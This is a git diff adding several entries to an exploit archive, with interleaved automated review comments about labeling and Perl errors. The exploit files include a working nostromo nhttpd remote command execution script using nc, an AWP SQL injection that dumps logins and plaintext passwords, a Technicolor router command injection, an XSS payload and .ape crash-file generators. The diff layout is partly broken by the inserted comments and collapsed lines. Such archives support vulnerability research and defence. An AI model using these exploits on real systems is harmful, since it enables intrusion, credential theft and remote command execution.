diff --git a/files.csv b/files.csv
index 96f27b28e..04c597eae 100755
--- a/files.csv
+++ b/files.csv
@@ -31937,3 +31937,12 @@ id,file,description,date,author,platform,type,port
 35456,platforms/php/webapps/35456.txt,"BoutikOne rss_promo.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
 35457,platforms/php/webapps/35457.txt,"BoutikOne rss_top10.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
 35459,platforms/php/webapps/35459.txt,"Cart66 Lite WordPress Ecommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80
+35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 V2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80
+35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability",2014-12-04,"Robert Cooper",cgi,webapps,80
+35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass Vulnerability",2011-03-14,"DcLabs Security Research Group",multiple,remote,0
+35465,platforms/multiple/remote/35465.pl,"VLC Media Player 1.0.5 '.ape' File Denial of Service Vulnerability",2011-03-15,KedAns-Dz,multiple,remote,0
+35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 Directory Traversal Remote Command Execution Vulnerability",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0
+35467,platforms/php/webapps/35467.txt,"SugarCRM <= 6.1.1 Information Disclosure Vulnerability",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0
+35468,platforms/windows/remote/35468.pl,"Monkey's Audio '.ape' File Buffer Overflow Vulnerability",2011-03-16,KedAns-Dz,windows,remote,0
+35469,platforms/php/webapps/35469.txt,"Wikiwig 5.01 Cross Site Scripting and HTML Injection Vulnerabilities",2011-03-10,"AutoSec Tools",php,webapps,0
+35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS 'page_info.php' SQL Injection Vulnerability",2011-03-16,H3X,php,webapps,0
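Review bot: The rows for 35465 and 35468 are filed as type `remote`, but both scripts only write a 16-byte `.ape` file into the current directory for a media player to open, and 35465's own header calls it a `Local Crash PoC`; `remote` will mislead anyone filtering the index for network-reachable issues, so `dos` (or `local`) is the better fit if the index's existing type values allow it. The 35465 row also records platform `multiple` while the script header says `platform : Windows` and it shells out to the cmd.exe builtins `title`, `color` and `cls`. Minor: the 35463 row carries 2014-12-04 while the file's own header says `Date: 12/02/2014`.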
diff --git a/platforms/cgi/webapps/35463.txt b/platforms/cgi/webapps/35463.txt
new file mode 100755
index 000000000..29d494f47
--- /dev/null
+++ b/platforms/cgi/webapps/35463.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability
+# Date: 12/02/2014
+# Author: Robert Cooper (robertc[at]areyousecure.net)
+# Software Link: http://www.guruperl.net/products/awppro/
+# Tested on: [Linux/Windows 7]
+# Vulnerable Parameter: group_id=
+
+##############################################################
+
+PoC:
+
+http://server/cgi/client.cgi?act=list_zone&group_id=1'
+
+http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client--
+
+(Passwords are stored in plaintext)
+
+##############################################################
+
+http://www.areyousecure.net
\ No newline at end of file
diff --git a/platforms/hardware/webapps/35462.txt b/platforms/hardware/webapps/35462.txt
new file mode 100755
index 000000000..fd42b8cb0
--- /dev/null
+++ b/platforms/hardware/webapps/35462.txt
@@ -0,0 +1,24 @@ +Product: Wireless N ADSL 2/2+ Modem Router +Firmware Version : V2.05.C29GV +Modem Type : ADSL2+ Router +Modem Vendor : Technicolor +Model: DT5130 + +Bugs: +1- Unauth Xss - CVE-2014-9142 +user=teste&password=teste& +userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer="%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login + +2- Arbitrari URL redirect - CVE-2014-9143 +failrefer=http://blog.dclabs.com.br&login=Login&password= +pass&refer=/index.html&user=1&userlevel=15 + +3- Command Injection in ping field - CVE-2014-9144 +setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE + + +-- +Ewerson Guimaraes (Crash) +Pentester/Researcher +DcLabs / Ibliss Security Team +www.dclabs.com.br / www.ibliss.com.br \ No newline at end of file diff --git a/platforms/linux/remote/35466.sh b/platforms/linux/remote/35466.sh new file mode 100755 index 000000000..70ecce34a --- /dev/null +++ b/platforms/linux/remote/35466.sh 
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/46880/info
+
+nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data.
+
+An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges.
+
+nostromo versions prior to 1.9.4 are affected.
+
+#!/bin/sh
+######################################
+# #
+# RedTeam Pentesting GmbH #
+# kontakt@redteam-pentesting.de #
+# http://www.redteam-pentesting.de #
+# #
+######################################
+
+if [ $# -lt 3 ]; then
+ echo "Usage: $(basename $0) HOST PORT COMMAND..."
+ exit 2
+fi
+
+
+HOST="$1"
+PORT="$2"
+shift 2
+
+( \
+ echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
+ echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
+ echo "$@ 2>&1" \
+) | nc "$HOST" "$PORT" \
+ | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'
\ No newline at end of file
diff --git a/platforms/multiple/remote/35464.txt b/platforms/multiple/remote/35464.txt
new file mode 100755
index 000000000..97ff7ee14
--- /dev/null
+++ b/platforms/multiple/remote/35464.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46864/info
+
+Trend Micro WebReputation API is prone to a security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass the filter included in the download mechanism. Successful exploits may cause victims to download malicious files onto affected computers.
+
+This issue affects WebReputation API 10.5; other versions may also be vulnerable.
+
+ http://www.example.com/dist/nmap-5.51-setup.exe?
\ No newline at end of file
diff --git a/platforms/multiple/remote/35465.pl b/platforms/multiple/remote/35465.pl
new file mode 100755
index 000000000..350e06ff1
--- /dev/null
+++ b/platforms/multiple/remote/35465.pl
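Review bot: The `#!/bin/sh` line is line 9 of the new file, under seven lines of advisory prose, so the file is not a valid script as committed: executed directly, the shell would first try to run `source:` and each prose line as a command before reaching the script proper. The same prefix is applied to 35465.pl and 35468.pl, where it is worse, because the prose is not parseable Perl and `perl -c` would reject the whole file. Either keep the BID text in the index description and a sibling `.txt`, or move it below the shebang as comment lines, e.g. `# source: http://www.securityfocus.com/bid/46880/info`.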
@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/46868/info
+
+VLC Media Player is prone to a denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
+
+VLC Media Player 1.0.5 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+
+###
+# Title : VLC media player v1.0.5 (.ape) Local Crash PoC
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows
+# Impact : VLC media player Just Crashed
+# Tested on : Windows XP SP3 Fran?ais
+# Target : VLC media player v1.0.5
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# Usage : 1 - Creat APE file ( Monkey's Audio Format )
+# => 2 - Open APE file With VLC 1.0.5
+# => 3 - Crashed !!!
+# ------------
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";
+print " |===========================================================|\n";
+print " |= [!] Name : VLC media player v1.0.5 (Monkey's File) =|\n";
+print " |= [!] Exploit : Local Crash PoC =|\n";
+print " |= [!] Author : KedAns-Dz =|\n";
+print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
+print " |===========================================================|\n";
+sleep(2);
+print "\n";
+# Creating ...
+my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
+open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
+print file $PoC;
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! 
";
+close(file);
+
+#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
+# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
+# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah
+# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
+# Greets All My Friends (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
+# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers .
+# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker .
+#===============================================================================
\ No newline at end of file
diff --git a/platforms/php/webapps/35467.txt b/platforms/php/webapps/35467.txt
new file mode 100755
index 000000000..39f033ff0
--- /dev/null
+++ b/platforms/php/webapps/35467.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46885/info
+
+SugarCRM is prone to an information-disclosure vulnerability because it fails to restrict access to certain application data.
+
+Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
+
+
+http://www.example.org/sugarcrm/index.php?module=Accounts&action=ShowDuplicates
+
+http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates
\ No newline at end of file
diff --git a/platforms/php/webapps/35469.txt b/platforms/php/webapps/35469.txt
new file mode 100755
index 000000000..c7dde4c03
--- /dev/null
+++ b/platforms/php/webapps/35469.txt
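Review bot: The result of `open(file , ">", "Kedans.ape")` is never checked, and the `or die` on the following line is attached to the console `print`, which succeeds whether or not the file was written, so a failed open or write is still reported as `File successfully created!`. `die print "..."` is also wrong on its own: `print` runs first and returns 1, so the exception text the user sees is `1 at ... line N` rather than the intended message. The same three lines appear in 35468.pl. A lexical handle with checked calls fixes both: `open(my $fh, '>', 'Kedans.ape') or die "open Kedans.ape: $!";`, `print {$fh} $PoC or die "write Kedans.ape: $!";`, `close($fh) or die "close Kedans.ape: $!";`; the file also lacks `use strict; use warnings;`.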
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46888/info
+
+Wikiwig is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Wikiwig 5.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35470.txt b/platforms/php/webapps/35470.txt
new file mode 100755
index 000000000..bbe275471
--- /dev/null
+++ b/platforms/php/webapps/35470.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46896/info
+
+AplikaMedia CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/page_info.php?id_brt=[Sql_injection]
\ No newline at end of file
diff --git a/platforms/windows/remote/35468.pl b/platforms/windows/remote/35468.pl
new file mode 100755
index 000000000..74647054c
--- /dev/null
+++ b/platforms/windows/remote/35468.pl
@@ -0,0 +1,61 @@
+source: http://www.securityfocus.com/bid/46887/info
+
+Monkeyâ??s Audio is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
+
+#!/usr/bin/perl
+
+###
+# Title : Monkey's File Audio (All MPlayers) Buffer Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows
+# Impact : Overflow & Crash's
+# Tested on : Windows XP SP3 Fran?ais
+# Target : All Media Players
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# File Home : (http://www.monkeysaudio.com)
+# Error's Detected :
+# Media Player Classic v6.4.9.1 [MonkeySource.ax !0x020451a6()!] >> http://1337day.com/exploits/15581 || By KedAns-Dz
+# JetAudio v5.1.5.2 [JFACMDec.dll !0x02FA1BBD()!] >> http://packetstormsecurity.org/files/view/99200/jetaudio5152ape-overflow.txt || By KedAns-Dz
+# KMPlayer 2.9.3 [MACDec.dll !0x??????()!] >> http://packetstormsecurity.org/files/view/99190/kmplayerape-overflow.txt || By KedAns-Dz
+# VLC media player v1.0.5 [axvlc.dll !0x??????()!] >> http://1337day.com/exploits/15595 || By KedAns-Dz
+# QuickTime Player [Not Detected !!] ' Because Can not Read (APE) Files Format
+# RealPlayer [Not Detected !!] ' Because Can not Read (APE) Files Format
+# ------------
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";
+print " |======================================================|\n";
+print " |= [!] Name : Monkey's File Audio (.ape) All Players =|\n";
+print " |= [!] Exploit : Stack Buffer Overflow =|\n";
+print " |= [!] 
Author : KedAns-Dz =|\n";
+print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
+print " |======================================================|\n";
+sleep(2);
+print "\n";
+# Creating ...
+my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header (16 bytes)
+open(file , ">", "Kedans.ape"); # Evil File APE (4.0 KB)
+print file $PoC;
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close(file);
+
+#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
+# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
+# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah
+# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
+# Greets All Bad Boys (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
+# hotturks.org : TeX * KadaVra ... all Others
+# Kelvin.Xgr ( kelvinx.net)
+#===========================================================================
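Review bot: Nothing in this file supports the `Stack Buffer Overflow` banner or the index description `Monkey's Audio '.ape' File Buffer Overflow`: the 16-byte `$PoC` header written here is byte-identical to the one in 35465.pl, which the same author labels a `Local Crash PoC`, and the `Error's Detected` list records only what look like faulting addresses. Until a crash under attacker-controlled data is shown, the index entry and the BID prose about arbitrary code execution overstate what the hunk demonstrates; a comment such as `# Reproduces a crash on a malformed MAC header only; code execution is not demonstrated here` on the `my $PoC` line would keep readers from inferring more. The mis-encoded characters in the prose (`Monkeyâ??s`, `Fran?ais`, `cit?`) suggest the text was transcoded twice on import and should be re-saved from the original.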